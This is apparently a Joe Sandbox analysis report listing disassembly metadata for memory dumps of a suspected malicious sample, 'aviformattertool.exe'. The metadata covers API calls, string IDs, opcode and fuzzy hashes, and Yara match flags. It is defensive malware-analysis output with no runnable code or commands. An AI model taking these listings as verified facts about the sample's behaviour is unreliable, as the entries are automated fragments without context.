                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4018804020-0
                                                                                                                                                          • Opcode ID: d8ab10374c77eed6814e385520b1a56bb68f3b70bde979339e60bde44af80238
                                                                                                                                                          • Instruction ID: 04bbae8ea9d5cc17ab99d2aa4d135a1a5bb684fab6e6687f3b0c5f405b0a962e
                                                                                                                                                          • Opcode Fuzzy Hash: d8ab10374c77eed6814e385520b1a56bb68f3b70bde979339e60bde44af80238
                                                                                                                                                          • Instruction Fuzzy Hash: 9511CE71600304ABDB209F60DD84BA6BBB9FF41714F1044ADF9019B140EFB1E911CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                          • Instruction ID: caf149be7139da0827b4a2dd392ea1d97481cbb3fcf25317274e0eb6a4cb28b5
                                                                                                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                          • Instruction Fuzzy Hash: 56017E3244015AFBCF125F88DC418EE3F73BB18364B0A8416FA1859031DB32C5B9AB82
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A124A9
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A124B8
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A124CD
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A124D4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4018804020-0
                                                                                                                                                          • Opcode ID: ef52770a20343820dd0f0e1d01b006c224c711f3b223936bff984fd9dd5f7e73
                                                                                                                                                          • Instruction ID: e2f5249a874b98de452fb488713914c03c924f183bdbd91a398f0210c2a55db0
                                                                                                                                                          • Opcode Fuzzy Hash: ef52770a20343820dd0f0e1d01b006c224c711f3b223936bff984fd9dd5f7e73
                                                                                                                                                          • Instruction Fuzzy Hash: F6F03CB2640209AFDB00DF69ED85F9ABBACFF55710F004419FA05C6141DB71E561CFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A12009
                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 02A12028
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A12037
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A1204E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2456309408-0
                                                                                                                                                          • Opcode ID: f2cdde913cdd7077600d2e5902e00a7a4c3265251bf39ab272238a58904bbccb
                                                                                                                                                          • Instruction ID: 8ad9b3410fbb66a8b553a421be3f13ed999c3cf751950d64768135c5afb1df08
                                                                                                                                                          • Opcode Fuzzy Hash: f2cdde913cdd7077600d2e5902e00a7a4c3265251bf39ab272238a58904bbccb
                                                                                                                                                          • Instruction Fuzzy Hash: C3014B71940718DBC7259F68EE4879AFBB5FF08314F004A5DF84682590DF74AA49CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Event$H_prologSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1765829285-0
                                                                                                                                                          • Opcode ID: 739367ea0e95802ad6a11593a1f674d63eae2ff58aa9e8cec0455c9bc02e7d9b
                                                                                                                                                          • Instruction ID: f7e39e292a5c99cdc8594ebd457bf75b9554b002f4962a585b31437fc4fe8f89
                                                                                                                                                          • Opcode Fuzzy Hash: 739367ea0e95802ad6a11593a1f674d63eae2ff58aa9e8cec0455c9bc02e7d9b
                                                                                                                                                          • Instruction Fuzzy Hash: E1F05475A40110DFCB009FA8DCC9B88BBA4FF0D311F5081A9F619DB290CB759854CF51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog_memmove
                                                                                                                                                          • String ID: &'
                                                                                                                                                          • API String ID: 3529519853-655172784
                                                                                                                                                          • Opcode ID: 5de375e048800d6acafed659ffb5f698bb904df8241e7bfc466474c44ed181dd
                                                                                                                                                          • Instruction ID: 13fc778f09e82e12c78906bde5bb55e7e3762c85c15a9d3de8b58a5cf24986dd
                                                                                                                                                          • Opcode Fuzzy Hash: 5de375e048800d6acafed659ffb5f698bb904df8241e7bfc466474c44ed181dd
                                                                                                                                                          • Instruction Fuzzy Hash: 1A619F71D40219DFDF24DFA4CA91AEEFBBAAF48320F10416AD515AB191DF709A04CF61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Info
                                                                                                                                                          • String ID: $
                                                                                                                                                          • API String ID: 1807457897-3032137957
                                                                                                                                                          • Opcode ID: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction ID: 364ad7a5ee0565adc1119f8b40c781a5b07f5a98c0ad1d73c90734a45d6efa61
                                                                                                                                                          • Opcode Fuzzy Hash: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction Fuzzy Hash: F24126314047586AEB119628DD49BFB7FA8EB02704F1404F6ED46F71D2C2794928EFAB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02A18353,?,?,00000000), ref: 02A19650
                                                                                                                                                          • getsockname.WS2_32(?,?,?), ref: 02A19666
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastgetsockname
                                                                                                                                                          • String ID: &'
                                                                                                                                                          • API String ID: 566540725-655172784
                                                                                                                                                          • Opcode ID: 6b07edc69d91c0beaf4be00e022edbe51e3762bd6eba0ca047b92df946739319
                                                                                                                                                          • Instruction ID: 83fb3105286a7f1c3262ea00070ef3c573bde0aed005ca6da0a860c8eab12177
                                                                                                                                                          • Opcode Fuzzy Hash: 6b07edc69d91c0beaf4be00e022edbe51e3762bd6eba0ca047b92df946739319
                                                                                                                                                          • Instruction Fuzzy Hash: 53215376A002499FDB10DFA8D945ADEF7F5FF48324F10856AE918EB240DB30E9458B50
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1CC34
                                                                                                                                                            • Part of subcall function 02A1D210: std::exception::exception.LIBCMT ref: 02A1D23F
  • Part of subcall function 02A1D9C6: __EH_prolog.LIBCMT ref: 02A1D9CB
  • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
  • Part of subcall function 02A1D26F: __EH_prolog.LIBCMT ref: 02A1D274
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A1CC71
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02A1CC6A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 02A153EF
  • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
  • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
  • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02A15401
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• API String ID: 4128168839-3580179773
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
Strings
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: FileModuleName
• String ID: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe$x5}
• API String ID: 514040917-3315635817
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1396A
• std::runtime_error::runtime_error.LIBCPMT ref: 02A139C1
  • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
  • Part of subcall function 02A1A59E: __EH_prolog.LIBCMT ref: 02A1A5A3
  • Part of subcall function 02A1A59E: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A5B2
  • Part of subcall function 02A1A59E: __CxxThrowException@8.LIBCMT ref: 02A1A5D1
Strings
• Day of month is not valid for year, xrefs: 02A139AC
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month is not valid for year
• API String ID: 1404951899-1521898139
Uniqueness
• Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 02A1FA97
• __CxxThrowException@8.LIBCMT ref: 02A1FAAC
  • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_mallocstd::exception::exception
• String ID: bad allocation
• API String ID: 4063778783-2104205924
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A13C1B
• std::bad_exception::bad_exception.LIBCMT ref: 02A13C30
  • Part of subcall function 02A22437: std::exception::exception.LIBCMT ref: 02A22441
  • Part of subcall function 02A1A5D7: __EH_prolog.LIBCMT ref: 02A1A5DC
  • Part of subcall function 02A1A5D7: __CxxThrowException@8.LIBCMT ref: 02A1A605
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A13886
• std::runtime_error::runtime_error.LIBCPMT ref: 02A138A5
  • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
  • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
Strings
• Day of month value is out of range 1..31, xrefs: 02A13894
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month value is out of range 1..31
• API String ID: 3258419250-1361117730
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A138D2
• std::runtime_error::runtime_error.LIBCPMT ref: 02A138F1
  • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
  • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
Strings
• Year is out of valid range: 1400..10000, xrefs: 02A138E0
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Year is out of valid range: 1400..10000
• API String ID: 3258419250-2344417016
                                                                                                                                                          • Opcode ID: 0aadb3d2033c4bae4361086f4117c1d641948848ca2e87c061421edb2ab86492
                                                                                                                                                          • Instruction ID: 55cd7e1246e99b7cea307c10cdd97d8748f1e3afb4d438313f181f47c3611f04
                                                                                                                                                          • Opcode Fuzzy Hash: 0aadb3d2033c4bae4361086f4117c1d641948848ca2e87c061421edb2ab86492
                                                                                                                                                          • Instruction Fuzzy Hash: E0E0D872FC02049BE715EB988D11BEDB779DF08B20F00048AF50267280DEB51944CB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1391E
• std::runtime_error::runtime_error.LIBCPMT ref: 02A1393D
  • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
  • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
Strings
• Month number is out of range 1..12, xrefs: 02A1392C
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Month number is out of range 1..12
• API String ID: 3258419250-4198407886
• Opcode ID: 45c7a79bdaca0023802e69e17c44ec4435e6e35f7114ced78373b7ce193102d0
• Instruction ID: 3f5ab4789514d8913dc48c9b756223b57d14d211554e07d31c80382a16004cca
• Opcode Fuzzy Hash: 45c7a79bdaca0023802e69e17c44ec4435e6e35f7114ced78373b7ce193102d0
• Instruction Fuzzy Hash: D7E0D872F802089BE715BB988E11BEDB779DF08B20F00008AF90167280DEB529048B95
Uniqueness
Uniqueness Score: -1.00%

APIs
• TlsAlloc.KERNEL32 ref: 02A119CC
• GetLastError.KERNEL32 ref: 02A119D9
  • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: AllocErrorH_prologLast
• String ID: tss
• API String ID: 249634027-1638339373
• Opcode ID: 1e632ecab3baed7d12035959ae142ccf771b783e553ca2993effef10c411891f
• Instruction ID: 79fe04e74b909b279333232c59fdb4c01bce78762cb8990c6dfbc15274bc7d2e
• Opcode Fuzzy Hash: 1e632ecab3baed7d12035959ae142ccf771b783e553ca2993effef10c411891f
• Instruction Fuzzy Hash: 3DE08671D442155BC3007B78DD0908BBBE49A42370F108B66FDBA872D0EF3489118BC6
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A13BD8
• std::bad_exception::bad_exception.LIBCMT ref: 02A13BED
  • Part of subcall function 02A22437: std::exception::exception.LIBCMT ref: 02A22441
  • Part of subcall function 02A1A5D7: __EH_prolog.LIBCMT ref: 02A1A5DC
  • Part of subcall function 02A1A5D7: __CxxThrowException@8.LIBCMT ref: 02A1A605
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
• Opcode ID: 1c6eb0f103dab558218a71a752e5fee25288dd6ee917b2838c77f1710e0f7a7c
• Instruction ID: 841b8330eff09db385657c53e8761b69668f6da32f90a181fd7bbcc231ca116d
• Opcode Fuzzy Hash: 1c6eb0f103dab558218a71a752e5fee25288dd6ee917b2838c77f1710e0f7a7c
• Instruction Fuzzy Hash: 89E09A70940108DBCB05EF58D241BACB771EB04310F4080A8A9065B280DF308A09CE81
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: JSON Nested Objects 66
• API String ID: 3356406503-4184186574
• Opcode ID: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
• Instruction ID: aa3bd1ae59daaa3fa17d745cbcdd45fda04deab230bb4da5387f22543defac0c
• Opcode Fuzzy Hash: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
• Instruction Fuzzy Hash: 67D05E30D48106FAC7005F648F0D22E3AE4AE043447224837A513B40D0C77C8A026A5F
Uniqueness
Uniqueness Score: -1.00%

APIs
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
• HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
• Opcode ID: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
• Instruction ID: a42712acd455d35c8afd215c706735e8fa7757c2ad65ecbc9136afbab992c5c7
• Opcode Fuzzy Hash: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
• Instruction Fuzzy Hash: 59114C702003019FD7308F19EE4A9227BB9FB847617154A3AF192E71F0D7729961DF19
Uniqueness
Uniqueness Score: -1.00%